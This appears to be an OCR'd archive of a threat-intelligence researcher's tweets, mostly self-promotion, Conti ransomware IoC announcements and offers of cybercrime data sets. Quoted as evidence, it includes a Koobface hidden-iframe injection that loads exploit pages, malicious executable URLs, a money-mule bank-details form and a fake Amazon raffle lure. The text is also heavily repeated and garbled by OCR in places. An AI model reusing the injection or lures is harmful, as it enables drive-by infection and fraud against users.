Regards. Dancho https://t.co/uU6NbaqmYUv 
27 - Tuesday


08:50 


https://t.co/vgkBxFCBUQ | https://t.co/JTcqOaYgET | https://t.co/UZ6qVANXVF | 
https://t.co/ZOwW9r2oiV | https://t.co/Vv4nwa4tzj | https://t.co/sMWCGUWRé6g | 
https://t.co/OmUajr8DTS8 | https://t.co/nNSXMPrGi0 Enjoy! #Threatintel 
#Threatintelligence https://t.co/JAOodZm1tz 
28 - Wednesday


11:27 


Awesome! - https://t.co/eole2BVFY3 #security #cybercrime #malware 




#Threatintelligence #threathunting Always yours at - https://t.co/JTcqObfRwr Stay
tuned! https://t.co/KEPXOXy5Tq
potekhini4@bk.ru
agressivex.com
ANDROID
com.example.livemusay.myapplica...


Who remembers this and my "In Retrospective" blog post series at - 
https://t.co/JTcqOaYOur? Stay tuned! The best is yet to come! Regards. Dancho 
https://t.co/U7uUETwu8v2 
HNNCast052110


11:32 


This is in retrospective to my previous tweet. Here’s the public reference - 
https://t.co/PZjpuOGmyYi #Threatintelligence #threathunting always yours at
https://t.co/JTcqOaYOur Stay tuned! https://t.co/quCGGRw53w 


11:34 


My BIO - https://t.co/JTcqOaYOur stay tuned! #Threatintelligence #threathunting 
https://t.co/IfJ/LldThz6 
Background


I was born in Sofia, Bulgaria. My primary area of

occupation since the early 90's is computers. My 

— work is Disruptive individual's Chief 
xecutive Officer (CEO) 


Dancho 
Danchev Executive BIO 


Warindustries - Member 

BlackCode Ravers - Member 

Black Sun Research Facility - Contributor 
DiamondCs - List Moderator/Software Contributor 
LockDownCorp - Help Trojan Database Contributor 
Forbidden HelpNetSecurity - Contributor 
Astalavista Security Group - Managing Director 
Frame4 Security Systems - Contributor 
TechGenix - WindowSecurity - Contributor 

ZDNet Zero Day - Security Blogger 

Webroot Threat Blog - Security Blogger 


Conference and Events - Media and Press Coverage 


Dancho Danchev is the world’s leading expert in the field of cybercrime fighting and threat intelligence gathering
having actively pioneered his own methodology for processing threat intelligence leading to a successful set of
hundreds of high-quality analysis and research articles published at the industry's leading threat intelligence blog -
ZDNet's Zero Day, Dancho Danchev's Mind Streams of Information Security Knowledge and Webroot's Threat
Blog with his research featured in Techmeme, ZDNet, CNN, PCWorld, SCMagazine, TheRegister, NYTimes, CNET,
ComputerWorld, H+Magazine currently producing threat intelligence at the industry's leading threat intelligence
blog - Dancho Danchev's - Mind Streams of Information Security Knowledge


With his research featured at RSA Europe, CyberCamp, InfoSec, GCHQ and Interpol the researcher continues to
actively produce threat intelligence at the industry's leading threat intelligence blog - Dancho Danchev's -
Mind Streams of Information Security Knowledge publishing a diverse set of hundreds of high-quality research
analysis detailing the malicious and fraudulent activities at nation-state and malicious actors across the globe


11:42 


Exclusive! This is from the "believe it or not but I’m positive that the source of this 
screenshot is real" department and hey they truly know how to say "hi" to me - 
https://t.co/mQWkOSpQgw #Threatintelligence https://t.co/evY6NKBsYD 
Wholesale domain registration and internet services -- OnlineNIC Inc. - Mozilla Firefox
11:46


Oops. I might get into "trouble" for posting this. I got an email recently and hence
the result. Fans from across the globe unite. Hackers and diamonds are forever. 
Bulletproof hosting services courtesy of the RBN are eternal - https://t.co/JTcqOaYOur 
Thanks! https://t.co/LGO4PeULsa 


11:50


Awesome! In retrospective. This is the Koobface Botnet attempting to serve 
client-side exploits to unsuspecting end users combined with scareware which I refer
to as "double-layer" monetization. Guess who spread the word? - 
https://t.co/CSesdWfccy stay tuned! https://t.co/xnFfFVu980 


<div id="Layer1" style="position:absolute; left: 0px; top: 0px; width: 100px;
height: 100px; z-index:1; visibility: hidden;">


<iframe src="http://el3x.cn/testl3/index.php" width="1" height="1"></iframe>
<iframe src="http://kiano-180809.ccm/oko/heip.html" width="1"
height="1"></iframe>


11:53 
Awesome! - https://t.co/uFPivg61sO #security #cybercrime #malware 
#Threatintelligence https://t.co/ZBuqURAUrB 
11:55 


Recommended bed time reading? Check this out! - https://t.co/UZ6qVAI5Ld #security 
#cybercrime #malware #Threatintelligence https://t.co/F85ijlhy1s 
Dancho Danchev


An In-Depth Picture Inside Security Researcher's Dancho
Danchev Understanding of Security Hacking and
Cybercrime Incidents


Dancho Danchev's Personal Security Hacking and
Cybercrime Research Memoir


11:59 


This is the infamous https://t.co/SSoKeadcyZ my workplace circa 2003-2006 under 
my management where | was acting as a Managing Director. The best and most fun 
time ever! Here’s a copy of the newsletter - https://t.co/PG1UftvEvS [PDF] Enjoy! 
https://t.co/gNAWkWgudk 
12:02


Home 


Top 10 Tools Security Directory Security News 


Tutorials Geeky Photos 


Links 


About Astalavista Sitemap 


Test your network security from a hacker's point of view with GFi LANquard 1.5.5!
Version 7 now offers anti-virus/anti-spyware checks & hybrid environment support - Download today!


3.GB FREE! 


Astalavista.net member


Linking to) 

We are always 

Contact us. | 

Astalavista FAQ , read it before 

Interview with 2 core founder Our mission 
Asta’s Security Newsletter Monthly rele 
New to Astalavista.com? frst tee 


Danger: Authenticating e-mail can break it
Novell in $72m security management buy
Telecommuting security concerns grow
Kids outsmart Web filters
We're winning the war against hackers
Man fined $US84k in spyware case
Yahoo accused of helping jail Internet writer
Mozilla users urged to upgrade
Microsoft to close security updates on old Windows


The Evolution Of Spy Tools
Internet Explorer Virtualizer 


Social Engineering: The Biggest Risk to 
Internet Security 


Reversing Ransomware / Cyber 
extortion malicious code - video 


The Price of Restricting Vulnerability 
Publications 


Nodezilla 0.4.18 


LET - Layer Four Traceroute (LEFT) and 
Whos 


Brief analysis of security scam hijacker 
installation method 


5 Reasons to Choose Simple Sandboxing 
Debugging 101 

Web Application Scaurity Podcast 
Oracle Database Security 

An Economic Analysis of Airport Security 
Screening 

How to Encrypt BitTorrent Traffic 


Direct download copy available here - https://t.co/Iq12sbCOqM #Threatintelligence 
https://t.co/9YZDFGPlar 
12:03 


[Screenshot: Database Viewer (Copyright © 1999, Diamond Computer Systems Pty. Ltd.) listing entries including Sender 1.03 and Sender 1.04]


https://t.co/JTcqOaYOur #Threatintelligence https://t.co/hiZ52Me7ch 


SIZE: 124928 


REMOTE ACCESS TROJAN 
WORM: E-MAIL PROPAGATION 
WORM: IRC PROPAGATION 
KEYSTROKE LOGGER 
FTP SERVER 
PASSWORD GRABBER 
DESTRUCTIVE 
TARGETS SPECIFIC PROGRAMS 
STARTS EVERYTIME WINDOWS STARTS 

\Windows\CurrentVer 

The functions of this trojan are 

\RunServi 

Information Copyright © 1999, Dancho Danchev (dancho@mbox.digsys.bg) 


12:06 




Second Life. Previous Life. Music is everywhere and so is the VuuV festival - 
https://t.co/OVOZgS5DIH stay tuned! https://t.co/WZKaRWUYIG 


12:09 


Awesome! Here are some screenshots from an on demand research study which | 
very good friend inquired about hence the results - https://t.co/EoqgHZobvUD 


#Threatintelligence https://t.co/iPG7e3Ctlc 


WP: 92.19,213.191 
Domaier host-92-19-213-194 static as 13285.net 
Kingoom 


23:11 


A cyber warfare doctrine that’s aiming to prevent sensitive military secrets from leaking 
is forgetting some of the basics of information warfare - disinformation, or come and 
hack us, and steal our tweaked sensitive military secrets. 


23:12 


On purposely disinforming on the actual state of cyber warfare preparedness by on 
purposely suffering security breaches, then whining how they have managed to 
break in then whine how they did it. Outstanding! 


29 - Thursday 


10:25 
https://t.co/JTcqOaYOur #threatintelligence https://t.co/NOUOQLkDOy 
10:41 


@campuscodi https://t.co/J/TcqQaYOur 


30 - Friday 


04:20 
https://t.co/JIcqOaYOur #threatintel https://t.co/7654Z)YfHr 
04:20 
https://t.co/JTcqOaYOur #threatintel https://t.co/WGOjVLJTtb 
https://t.co/JTcqOaYOur #threatintel https://t.co/aJgeVuyONT 
https://t.co/ADWYDE11hN #NowPlaying Cheers! 
04:23 


https://t.co/JTcqObfRwr #threatintel https://t.co/wqFZfOK6f6 


You have new message. Read 


a John Blackmore 
Tasks | Messages | Mymoney | My Profile | Documents | Officialinvoices | Help | Quit 
https://t.co/JTcqOaYOur #threatintel https://t.co/PW45YmcjLx 


C2 Transaction 136357 


09.01.2009 % 
High 18:46:50 — 
~ 09,01,2009 
@@ Transaction 136360 Done High 18:45:18 


https://t.co/TcqOaYgET #threatintel https://t.co/XFxKXEmQJt 
https://t.co/JTcqOaYOur #threatintel https://t.co/mEJJLXyNM8& 


Why are you gathering so much information about applicants? Such attention especially to bank account details puts me on guard. 


In fact that modern financial system is a complex instrument, which controls financial streams, The problem is that any transfer may 
be delayed (from 1 to 5 days) but it is unacceptable for our business. Transaction should be completed by a financial manager the 
same day money is deposited into the bank account. Othervise, we risk to lose money, clients, reputation. Analyzing all the details 
below we'll be able to prepare tasks for every agent individually. Please fill in all the fields carefully to avoid delays while working with 
your bank. The success of our cooperation depends on the accuracy of entered details! Please be serious. 


“You are responsible for reliability of this information. If you're having any difficulties please contact your bank, 


Banking Details 

Account Type (checking/saving)*: 
Name on the Account*: 
Account Number*: 
Routing Number*: 
Date you opened your bank account*: 
Have you ever used Western Union/Money Gram?*: 


04:25 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/fFVIPqb9xiy 
06:02 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/2qVqIMtjnp 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/Rk5J43r3eu 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/KVY26fuht7 
06:03 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/zLOZ9Jfcl4 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/WBMCdCj5Br 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/bgcwZqPoAO 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/FQW2wOLATO 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/uUHOZyC3ab 
TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/Y3uH4Rslt2 
06:05 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/5hjosFKMyM 
06:05 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/KO9AsxXrOse 
06:06 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/sSTKMVizqox 
06:06 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/feGlIEqGPDo 
06:06 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/yQIN6Pqnqu 
06:07 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/Gm9WDPfoSf 
06:07 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/k9Q8Zsg8et 




06:07 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/OLAOMhIxsO 




06:07 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/S6XufuaGqx 
06:08 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/Fo8sVOTdoy 




06:08 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/2ThkQ2d8za 
06:08 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/g8a48Cl2Cd 


06:08 


TSCM in my place taking place back in the day. The pleasure is all mine! 
https://t.co/G4DnCFsVsH 




06:13 
https://t.co/JTcqObfRwr https://t.co/8rGiZqTDKz 
October 


4 - Tuesday 


01:27 


Tomorrow I'm in Sofia, Bulgaria for a conference on the topic of cyber security. 
If you are interested in meeting up and getting acquainted, write to 
dancho.danchev@hush.com and we'll arrange a meeting. See you there! Regards. 
Dancho. - https://t.co/d2VpdRYa9I 


04:26 


What we play in the lab - https://t.co/JTcqObfRwr what’s your Steam ID? 
https://t.co/kdTrVMEVP7 
Call of Duty: Modern Warfare 3 


Sniper: Ghost Warrior 


6 - Thursday 


02:24 
https://t.co/JTcqOaYgET https://t.co/Sr3eKT4D5d 
Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 


04:24 
Who wants to ask me research questions for my upcoming Second Edition of my 
"Cyber Intelligence" memoir? 
05:47 


Who wants to ask me questions for the second edition of my memoir in 
Bulgarian, "Cyber Intelligence"? 


8 - Saturday 


00:07 


https://t.co/Bqbi2IDQOD #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #CyberSecurityAwareness #Threatintelligence 
#ThreatHunting #threatintel 


21 
21:54 


Who wants access to this? Regards. Dancho #security #cybercrime #malware 
#CybersecurityNews #CybersecurityAwarenessMonth #ThreatHunting 
#threatintelligence #threatintel https://t.co/Q9KI2qXFVn 
9 - Sunday 


00:45 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/eqXvjcSilO 
00:46 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/pKZurdNOi9 


[Screenshot: browser console showing repeated GET requests to https://212.129.41.246:6001/socket.io/ (EIO=3, transport=polling), each failing with net::ERR_SSL_PROTOCOL_ERROR]


00:47 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/XPAkiIT7VNg 


[Screenshot: browser window on a3ggjhcskbjg36bx.onion with developer tools open]


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/DUvyj6OPCz 


Confirmation code for RingCentral Operator #00020 
ERROR: Update your Adobe Reader or try on another computer. 


00:49 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/ikg3cXr6gv 
SQLSTATE[42S22]: Column not found: 1054 Unknown column 'api_token' in 'field list' 

Illuminate\Database\QueryException 

Doctrine\DBAL\Driver\PDOException 

PDOException 

PDO prepare 


00:49 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/IG8f9k7Ipd 


Response Headers 


Cache-Control no-cache, private 
Connection Keep-Alive 
Content-Length 2 
Content-Type application/json 
Date Mon, 29 Jun 2020 13:55:53 GMT 
Keep-Alive timeout=5, max=100 
Server Apache/2.4.2 (Win64) PHP/7.3.13 OpenSSL/1.0.1c 
X-Powered-By PHP/7.3.13 
X-RateLimit-Limit 60 
X-RateLimit-Remaining 59 


Request Headers 


Accept text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Encoding gzip, deflate, br 
Accept-Language en-US,en;q=0.5 
Connection keep-alive 
Host a3ggjhcskbjg36bx.onion 
Upgrade-Insecure-Requests 1 
User-Agent Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 


00:50 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/CiiAJFFANo 
[Screenshot: Avast Business Antivirus settings, Personal Privacy page]

Learn how we process your data in our Privacy Policy. See the categories of data we process in our Product Policy. 

Improvements 
Share threat data with Avast to improve the security of all Avast antivirus users (Community IQ) 
Share app-usage data with Avast to help us with new product development. 
Share app-usage data with 3rd-party analytics tools to improve this app. 

Offers 
Share app-usage data with Avast so we may offer you upgrades or our other products 
Share app-usage data with Avast so we may offer you 3rd party products. 

These settings apply only to Avast Business Antivirus 


00:50 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/lgiNKqxXOuw 


DecumentPreview42)-exe Failed - Virus detected x 


https://wwnw.omegasystemsuae.com/DocumentPreview.exe 


= https://app.pmtscr.com/build/setup-lightshot.exe 


Failed - Virus detected x 


https://allacestech.com/DocumentPreview.exe 


00:51 
Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5clc7 Front Page here - https://t.co/OmUajqR2uy 
Awesome! Research here - https://t.co/YLxOuf0jWV Awesome! 
https://t.co/b7B3u2ix6w 


[Screenshot: account edit form with the fields Login, Password (Update Password), Confirm Password, Commission's Rate (15.00) and Is Banned]


00:52 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/qshgvhysh3 


‘$16 /day+1 day up to 11:59PM 


00:53 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/xsesXF5Yge 
00:53 
Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5clc7 Front Page here - https://t.co/OmUajqR2uy 
Awesome! Research here - https://t.co/YLxOufOjWV Awesome! 
https://t.co/OMeuKOIVUJ 
2 
00:54 
Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! 
https://t.co/7 LCUfvGKHN 


00:55 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! 
https://t.co/qgVCvwHMnx9 
00:55 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/V2IqrEi9li 
let’s get started 


00:55 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/IchOTItumS 


[+] WinSock initialized 

[+] I0 completion port initialized... 

Check server 139.680.168.206... 

[+] Server connected ... 

Stats: @ files “size 20.9 MB>, read speed 4.18 MB/sec ‘compression ra 
tio 91%>,. upload @ bytes/sec 

Stats: 71 files ‘size 529 MB>. read speed 26.4 MB/sec ‘compression ra 
tio 992%), 8.31 MB/sec 

Stats: 166 files “size 2.17 GB>, vead speed 27.8 MB/sec “compression 
ratio 99%). upload 22.9? MB/sec 

Stats: 266 files “size 3.75 GBD, vead speed 27.4 MB/sec Ccompression 


ratio 99%>,. upload 25.@ MB/sec 
36 


Stats: 3 files <size 5.36 GB>. vead speed 27.4 MB/sec ‘compression 
ratio 99%>, upload 25.6 MB/sec 


00:56 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/niEBmDr89F 
Amazon 30th Anniversary Celebration 


Amazon's 30th Anniversary Celebration is coming to an end. 
Today is the last stage of the raffle for a USD 10-200 gift card and other prizes 
To participate in the raffle, you need to download the Lottery App and generate a unique code 


Our system will automatically select the winners and send gifts to your email address within a few days after applying for participation 


How to take part in the raffle? 
1. Download the application 
2. Run the application, The application will generate a code to participate in the lottery 


3. Enter the code in the text field below 
00:56 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5clc7 Front Page here - https://t.co/OmUajqR2uy 
Awesome! Research here - https://t.co/YLxOufOjWV Awesome! 
https://t.co/Hq6ikEOdyg 


@ Apple 


Hello! 
Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! 
https://t.co/ulGWaxgnWz 


00:57 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaqf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! 
https://t.co/O3pvyo4LkH 
[Screenshot: Russian-language interface with a comments section and an "Enter message..." input field]


00:58 


Conti Ransomware Gang IoCs (Indicators of Compromise) in STIX2/TAXII format 
courtesy of me - https://t.co/m49Cs5uuaf Front Page here - https://t.co/OmUajr9bIG 
Awesome! Research here - https://t.co/YLxOufitb3 Awesome! https://t.co/x1CsKOUYIf 
05:51 


Folks. I’m hosting a live Q&A - https://t.co/GOYJoEe1xS Ask your questions! 
Enjoy! - https://t.co//TcqOaYOur #security #cybercrime #malware #ThreatHunting 
#threatintelligence #threatintel https://t.co/FHCc1ghgkjF 


22 *1 
Where do you know Dancho Danchev from? 

O Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 
O Astalavista.com (2003-2006) 
O ZDNet's Zero Day Blog 
O Webroot's Threat Blog 
O The Koobface Botnet 
O Just a very good friend who I admire 
O Invite-only Conference Held in 2010 
O RSA Europe 2012 
O InfoSec 2012 


07:28 


My setup for today. Pretty portable but I’m fine. FortiMail and FortiSandbox in place. 
Keep all the spam and malware coming and see the results at https://t.co/JTcqObfRwr 
Enjoy! https://t.co/uAvOn3DZFI 
10 - Monday 


19:21 


"A Brief Overview of Disruptive Individual’s Methodology for Processing Distributing 
Disseminating and Responding to Cyber Threat Incidents - An Analysis" - 
https://t.co/xRgsfmgLhZ Front page: https://t.co/OmUajr9bIG #Threatintel 

#Threatintelligence 


19:22 


"Introduction to Disruptive Individual’s Response to the Conti Ransomware Gang’s 
Internet-Connected Infrastructure - Check Out the Take Down Efforts!" - 
https://t.co/TYV2P3Hfugq Front page: https://t.co/OmUajr9bIG #Threatintel 
#Threatintelligence 


19:24 


Conti #ransomware gang IoCs (Indicators of Compromise) in STIX2/TAXII here - 
https://t.co/m49Cs5uuqf 562 pages report here - https://t.co/BOQKpDCB2K Original 
post: https://t.co/TYV2P3Hfugq Front page: https://t.co/OmUajr9bIG #Threatintel 
#Threatintelligence 


23 
12 - Wednesday 


03:57 


:) #Threatintelligence https://t.co/SrcymK3s6r 


04:38 
God Bless the United States of America. https://t.co/U2fsoGQcLA 


14 - Friday 


04:57 


My Google Knowledge Panel. https://t.co/vgkBxFD9Ko https://t.co/BwLlumcbav 


*1 
Dancho Danchev 


Researcher 


Dancho Danchev is an independent security consultant and 
cyber threats analyst, with extensive experience in open 
source intelligence gathering, and cybercrime incident 
response. 


https://cybernews.com > danchod 


05:21 
My latest interview online - https://t.co/39JWq7VGBL 


15 - Saturday 


11:44 


I just checked my followers. I’m in a very good company. Tnx for the follow. @curtw 
@kevtownsend @MishaGlenny @threatresearch @sergiohernando @dragosr 
@Jeremy_Kirk @JamzYaneza @lennyzeltser @jimmychappell @jcanto @Wh1t3Rabbit 
@stiennon @securityaffairs @J3rge 
16 - Sunday 


03:52 
Who wants or needs access to my 64GB Cybercrime Forum Data Set for research and 
situational awareness purposes? I also have a second 3GB compilation of tools of the 
trade courtesy of the bad guys. Drop me a line at dancho.danchev@hush.com 
https://t.co/jF2QHb6H82Q 
CYBERCRIME FORUM DATA SET 2091 

OVER 111] FULL OFFLINE COPIES (19GB) OF PUBLICLY ACCESSIBLE CYBERCRIME FORUM COMMUNITIES. FREE TO DOWNLOAD FOR PROCESSING AND ENRICHMENT. 

APPROACH ME AT DANCHO.DANCHEV@HUSH IN ORDER TO OBTAIN A FREE COPY! 


03:53 


Who wants or needs access to my 64GB Cybercrime Forum Data Set for research and 
situational awareness purposes? I also have a second 3GB compilation of tools of the 
trade courtesy of the bad guys. Drop me a line at dancho.danchev@hush.com 
https://t.co/ewdQOQweE0 
18:18 


Subscribe! - https://t.co/7GM1oNfgvi #security #cybercrime #malware 
#CybersecurityAwarenessMonth #cybersecuritytips #CyberSecurityAwareness 
#threathunting #threatintelligence #threatintel 


21 %1 


17 - Monday 


06:10 
Subscribe! https://t.co/HUEVNbuGr5 https://t.co/RmMUrMChucU 
18 - Tuesday 
01:37 


01:37 


01:37 


01:38 
DANCHO DANCHEV'S OFFENSIVE 
WARFARE 2.0 - THE WEB'S 
PRIMARY CYBERCRIME 
RESEARCH OSINT AND THREAT 
INTELLIGENCE CENTRAL 
CLEARING HOUSE 


Dancho Danchev is the world's leading expert in the field 
of cybercrime fighting and threat intelligence gathering 
having actively pioneered his own methodology for 
processing threat intelligence leading to a successful set 
of hundreds of high-quality analysis and research articles 
published at the industry's leading threat intelligence blog 
— ZDNet's Zero Day, Dancho Danchev's Mind Streams of 
Information Security Knowledge and Webroot's Threat 
Blog with his research featured in Techmeme, ZDNet, 
CNN, PCWorld, SCMagazine, TheRegister, NYTimes, CNET, 
ComputerWorld, H+Magazine currently producing threat 
intelligence at the industry's leading threat intelligence 
blog — Dancho Danchev's — Mind Streams of Information 
Security Knowledge. With his research featured at RSA 
Europe, CyberCamp, InfoSec, GCHQ and Interpol the 
researcher continues to actively produce threat 
intelligence at the industry's leading threat intelligence 
blog — Dancho Danchev's — Mind Streams of Information 
Security Knowledge publishing a diverse set of hundreds 
of high-quality research analysis detailing the malicious 
and fraudulent activities at nation-state and malicious 
actors across the globe. 


https://t.co/mjzvh5Rr66 


https://t.co/A9ePkoVIrN 


https://t.co/QCnBUhX3pq 


https://t.co/SR5ivFLSi) 


01:38 


01:38 


01:38 


01:38 


01:38 


01:38 


01:38 


01:39 


01:39 


01:39 


01:39 


01:39 


01:40 


01:40 


01:40 


https://t.co/8e7ZfeQuZG 


https://t.co/o3aOKOiaZd 


https://t.co/bRO5Z5bhlia 


https://t.co/2UDbwyF5jn 


https://t.co/slcASbQbbO 


https://t.co/wXFbS2zKdz 


https://t.co/AgPUHBxrQP 


https://t.co/YflzI56DE7 


https://t.co/TFclErw49u 


https://t.co/RsI3LdAZV9 


https://t.co/KoMDwB5Mal 


https://t.co/CjHLJ33whd 


https://t.co/7UL57KA6GI 


https://t.co/ZyzrVhkolW 


https://t.co/FbyzPLBql0O 




01:40 
https://t.co/uLPOhrAbTH 


01:50 
https://t.co/52kKUxvHZGP 


21 - Friday 


13:49 
Introducing Dancho Danchev’s 265GB "Cybercrime Research and Cybercrime 
Fighting” Torrent. Original post here - https://t.co/QCrwht6UKH Direct download link - 
https://t.co/ST3B5eZShu Second direct download link - https://t.co/dWEQmdrMJv RT 
pls! Enjoy! 


21 *%3 
13:50 
Original post here - https://t.co/QCrwhtnXmH Direct download link - 
https://t.co/ST3B5fgVju Second direct download link - https://t.co/dWEQmd9Dvn RT 
pls! Enjoy! #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth https://t.co/SSFh6cwpFw 


2 


13:57 


https://t.co/8mZuSzwZi4 #security #cybercrime #malware #CyberSecurity 
#CybersecurityAwarenessMonth #CyberSecurityAwareness #cybersecuritytips 
#cyberattacks #threatreport 
22:30 


Some big news announcements. Did you grab my 265GB cybercrime research 
torrent? - https://t.co/dWEQmdrM}Jv it seems that I’m somehow leading the IoCs 
production and dissemination game online which is great news. Stay tuned! 


22:30 


Cheers to @netresec who presented at @FIRSTdotOrg - https://t.co/dHe4VJMCQN on 
the SolarWinds Supply Chain Compromise and mentioned me in his presentation. 
Stay tuned! https://t.co/vwC5jT7opQ 


Thanks to Everyone who Contributed with pDNS! 


Joe Slowik, Rohit Bansal 


22:31 


It seems that I also made it into this research - "Acing the IOC Game: Toward 
Automatic Discovery and Analysis of Open-Source Cyber Threat Intelligence” - 
https://t.co/S5HorVlebal - which is outstanding news and I’m flattered. Stay tuned! 
https://t.co/9TPNI5fE77 


5.3. Understanding Intelligence Sources 

The availability of the longitudinal data (the IOCs collected over 
a span of 13 years) also enables us to investigate the qualities of 
the indicators produced by different sources and their timeliness 
against new threats, as reported below. 


Timeliness. Using the aforementioned attack clusters (see Table 7), 
we analyzed the distribution of the articles first reporting the attacks 
over different blogs, as shown in Figure 8b. We found that 10 
blogs were responsible for the first report of 60% the clusters (each 
cluster likely to be a campaign). For example, the blog Dancho 
Danchev first report 12 clusters, each time involving 45 IOCs on 
average, which later also showed up on other blogs. 


22:32 


I also made it into this "Competitors" slide courtesy of @jeffreycarr. Big thanks and 
I’m flattered. Stay tuned! https://t.co/oJNJfHZ9I) 
22:33 


Competitors 

Identified Competitors 
* Cyber Defense Agency (CDA) (US) 
* Cyber Security Research and Development Center (US) 
* Cyveillance (US) 
* Dancho Danchev (EU) 
* Department of Homeland Security US-CERT (US) 
* Ernst & Young (EU) 
* EWA Information and Infrastructure Technologies, Inc (US) 
* Fortify (US) 
* Global Security Mag (EU) 
* iDefense Labs (US) 
* iJET Intelligent Risk Systems (US) 
* Informatica (US) 
* IT-Information Sharing and Analysis Center (US) 
* iSIGHT Partners (US) 
* Lookingglass (US) 
* Multi-State Information Sharing Analysis Center (US) 
* nCircle (US) 
